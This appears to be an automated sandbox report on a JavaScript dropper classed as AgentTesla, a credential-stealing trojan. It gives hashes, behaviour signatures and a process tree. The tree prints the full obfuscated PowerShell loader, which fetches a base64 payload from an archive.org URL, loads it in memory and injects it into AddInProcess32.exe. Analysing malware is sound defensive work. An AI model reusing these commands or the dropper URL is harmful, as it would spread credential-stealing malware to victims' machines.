Overview

overview

10

Static

static

1

228256bcfe...457.js

windows7-x64

10

228256bcfe...457.js

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-09-2024 01:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457.js

  • Size

    320KB

  • MD5

    b54f5c7cb5ac3d69127941e40966ab0c

  • SHA1

    c75973c8bee061c5e4994e2e9da6ebb830719e31

  • SHA256

    228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457

  • SHA512

    26b0b14d52ed23906448121c2078e032fda790df95cd27c49a888fba3b17f725d494fc89298a6a99e795faa594de1ea4739a113331129bc3395f22a387f53987

  • SSDEEP

    6144:6Xx8rS9pLPEFSkgJisDKPdGuoKeM4k6iPrjt5DiqVAo2JIF1wS8TeBVDm6T3ViZ5:wx2spLPEFSkUisDKVA5k6arjLDi2PmCC

Score
10/10
agentteslacredential_accessdiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAMwB6ACcAKwAnAHUAcgBsACAAPQAgAGgAaQB6AGgAdAB0AHAAcwA6AC8ALwAnACsAJwBpAGEAJwArACcAOQAwACcAKwAnADQANgAwADEALgB1AHMALgBhAHIAYwBoAGkAdgBlAC4AJwArACcAbwByAGcALwA2AC8AaQAnACsAJwB0AGUAbQBzAC8AZABlAHQAJwArACcAYQBoAC0AbgBvAHQAZQAtACcAKwAnAGoAJwArACcALwAnACsAJwBEACcAKwAnAGUAdABhAGgATgBvAHQAZQBKACcAKwAnAC4AdAB4AHQAJwArACcAaABpAHoAJwArACcAOwBFACcAKwAnADMAegAnACsAJwBiACcAKwAnAGEAcwBlACcAKwAnADYANABDACcAKwAnAG8AbgB0AGUAbgB0ACcAKwAnACAAPQAnACsAJwAgACgATgAnACsAJwBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAJwArACcAdAAgAFMAeQAnACsAJwBzAHQAZQBtAC4ATgAnACsAJwBlAHQALgBXAGUAJwArACcAYgBDAGwAJwArACcAaQBlACcAKwAnAG4AdAApAC4ARABvAHcAbgAnACsAJwBsAG8AJwArACcAYQBkAFMAdAByAGkAbgBnACgAJwArACcARQAzAHoAJwArACcAdQByAGwAKQA7AEUAMwB6ACcAKwAnAGIAaQBuAGEAcgB5AEMAbwBuAHQAJwArACcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuACcAKwAnAHYAZQAnACsAJwByAHQAXQA6ADoARgByAG8AbQAnACsAJwBCAGEAcwAnACsAJwBlADYANABTAHQAcgBpAG4AZwAnACsAJwAoAEUAMwB6AGIAYQBzAGUANgAnACsAJwA0AEMAbwBuAHQAZQBuAHQAKQA7AEUAMwAnACsAJwB6AGEAcwBzAGUAJwArACcAbQBiAGwAeQAgAD0AIAAnACsAJwBbAFIAZQAnACsAJwBmAGwAZQAnACsAJwBjAHQAaQBvAG4ALgBBAHMAcwBlACcAKwAnAG0AYgBsAHkAXQA6ACcAKwAnADoATABvAGEAZAAoACcAKwAnAEUAMwB6AGIAaQBuAGEAcgB5AEMAbwAnACsAJwBuACcAKwAnAHQAZQAnACsAJwBuAHQAKQA7AEUAMwB6AHQAeQAnACsAJwBwAGUAIAAnACsAJwA9ACcAKwAnACAARQAzAHoAJwArACcAYQBzACcAKwAnAHMAZQBtACcAKwAnAGIAbAB5ACcAKwAnAC4ARwAnACsAJwBlAHQAVAB5AHAAZQAnACsAJwAoAGgAJwArACcAaQB6AFIAdQBuAFAARQAuAEgAbwBtAGUAaABpAHoAJwArACcAKQAnACsAJwA7AEUAMwB6ACcAKwAnAG0AZQB0AGgAJwArACcAbwBkACcAKwAnACAAPQAgAEUAMwB6AHQAeQAnACsAJwBwAGUALgBHACcAKwAnAGUAdABNAGUAdAAnACsAJwBoACcAKwAnAG8AJwArACcAZAAoAGgAaQB6AFYAQQAnACsAJwBJACcAKwAnAGgAaQB6ACkAJwArACcAOwBFADMAegBtACcAKwAnAGUAdABoAG8AZAAuAEkAbgB2AG8AJwArACcAawBlACgARQAzAHoAbgB1AGwAbAAnACsAJwAsACcAKwAnACAAJwArACcAWwBvAGIAagBlACcAKwAnAGMAJwArACcAdABbACcAKwAnAF0AXQAnACsAJwBAACcAKwAnACgAaABpAHoAdAAnACsAJwB4AHQALgA5ADkAMQAvACcAKwAnAHYAJwArACcAZQAnACsAJwBkAC4AJwArACcAMgByACcAKwAnAC4ANAA3ACcAKwAnAGEAZgAzACcAKwAnADIAYQBlAGMAOABlACcAKwAnADYAJwArACcAMABhADcAOAAyADcAOQA0ADYAJwArACcAMAAzACcAKwAnAGMAMABiADEAMwA0AGMAOQAzAC0AJwArACcAYgB1AHAAJwArACcALwAvADoAcwBwAHQAdAAnACsAJwBoACcAKwAnAGgAJwArACcAaQAnACsAJwB6ACAALAAgAGgAaQAnACsAJwB6AGQAZQBzAGEAdABpACcAKwAnAHYAYQBkAG8AaABpACcAKwAnAHoAIAAsACAAaABpAHoAJwArACcAZABlAHMAJwArACcAYQB0AGkAdgBhACcAKwAnAGQAbwBoAGkAegAgACwAJwArACcAIABoAGkAegBkAGUAJwArACcAcwBhAHQAaQAnACsAJwB2AGEAZAAnACsAJwBvAGgAaQAnACsAJwB6ACcAKwAnACwAJwArACcAaABpAHoAJwArACcAQQBkACcAKwAnAGQASQBuAFAAcgAnACsAJwBvAGMAZQBzACcAKwAnAHMAJwArACcAMwAyAGgAJwArACcAaQB6ACwAaABpAHoAJwArACcAZABlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBoAGkAJwArACcAegApACcAKwAnACkAJwArACcAOwAnACkALgBSAEUAUABsAEEAQwBFACgAKABbAGMASABhAFIAXQA2ADkAKwBbAGMASABhAFIAXQA1ADEAKwBbAGMASABhAFIAXQAxADIAMgApACwAJwAkACcAKQAuAFIARQBQAGwAQQBDAEUAKAAoAFsAYwBIAGEAUgBdADEAMAA0ACsAWwBjAEgAYQBSAF0AMQAwADUAKwBbAGMASABhAFIAXQAxADIAMgApACwAWwBzAHQAcgBJAE4AZwBdAFsAYwBIAGEAUgBdADMAOQApACAAfAAmACAAKAAgACQARQBOAHYAOgBDAE8AbQBTAHAARQBDAFsANAAsADIANAAsADIANQBdAC0AagBPAEkATgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('E3z'+'url = hizhttps://'+'ia'+'90'+'4601.us.archive.'+'org/6/i'+'tems/det'+'ah-note-'+'j'+'/'+'D'+'etahNoteJ'+'.txt'+'hiz'+';E'+'3z'+'b'+'ase'+'64C'+'ontent'+' ='+' (N'+'ew-Ob'+'j'+'ec'+'t Sy'+'stem.N'+'et.We'+'bCl'+'ie'+'nt).Down'+'lo'+'adString('+'E3z'+'url);E3z'+'binaryCont'+'ent = [System.Con'+'ve'+'rt]::From'+'Bas'+'e64String'+'(E3zbase6'+'4Content);E3'+'zasse'+'mbly = '+'[Re'+'fle'+'ction.Asse'+'mbly]:'+':Load('+'E3zbinaryCo'+'n'+'te'+'nt);E3zty'+'pe '+'='+' E3z'+'as'+'sem'+'bly'+'.G'+'etType'+'(h'+'izRunPE.Homehiz'+')'+';E3z'+'meth'+'od'+' = E3zty'+'pe.G'+'etMet'+'h'+'o'+'d(hizVA'+'I'+'hiz)'+';E3zm'+'ethod.Invo'+'ke(E3znull'+','+' '+'[obje'+'c'+'t['+']]'+'@'+'(hizt'+'xt.991/'+'v'+'e'+'d.'+'2r'+'.47'+'af3'+'2aec8e'+'6'+'0a7827946'+'03'+'c0b134c93-'+'bup'+'//:sptt'+'h'+'h'+'i'+'z , hi'+'zdesati'+'vadohi'+'z , hiz'+'des'+'ativa'+'dohiz ,'+' hizde'+'sati'+'vad'+'ohi'+'z'+','+'hiz'+'Ad'+'dInPr'+'oces'+'s'+'32h'+'iz,hiz'+'desativa'+'dohi'+'z)'+')'+';').REPlACE(([cHaR]69+[cHaR]51+[cHaR]122),'$').REPlACE(([cHaR]104+[cHaR]105+[cHaR]122),[strINg][cHaR]39) |& ( $ENv:COmSpEC[4,24,25]-jOIN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:2060
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:3284
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4316

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        a6c9d692ed2826ecb12c09356e69cc09

        SHA1

        def728a6138cf083d8a7c61337f3c9dade41a37f

        SHA256

        a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

        SHA512

        2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wu5k4ece.yc1.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1872-22-0x0000013D6FF90000-0x0000013D7019C000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/3020-29-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3020-12-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3020-11-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3020-1-0x0000023534B00000-0x0000023534B22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3020-0-0x00007FFBB7F43000-0x00007FFBB7F45000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4316-23-0x0000000000400000-0x0000000000442000-memory.dmp

        Filesize

        264KB

        Download

      • memory/4316-30-0x0000000005C70000-0x0000000006214000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4316-31-0x0000000005640000-0x00000000056A6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4316-32-0x0000000006A70000-0x0000000006AC0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4316-33-0x0000000006B60000-0x0000000006BF2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4316-34-0x0000000006AE0000-0x0000000006AEA000-memory.dmp

        Filesize

        40KB

        Download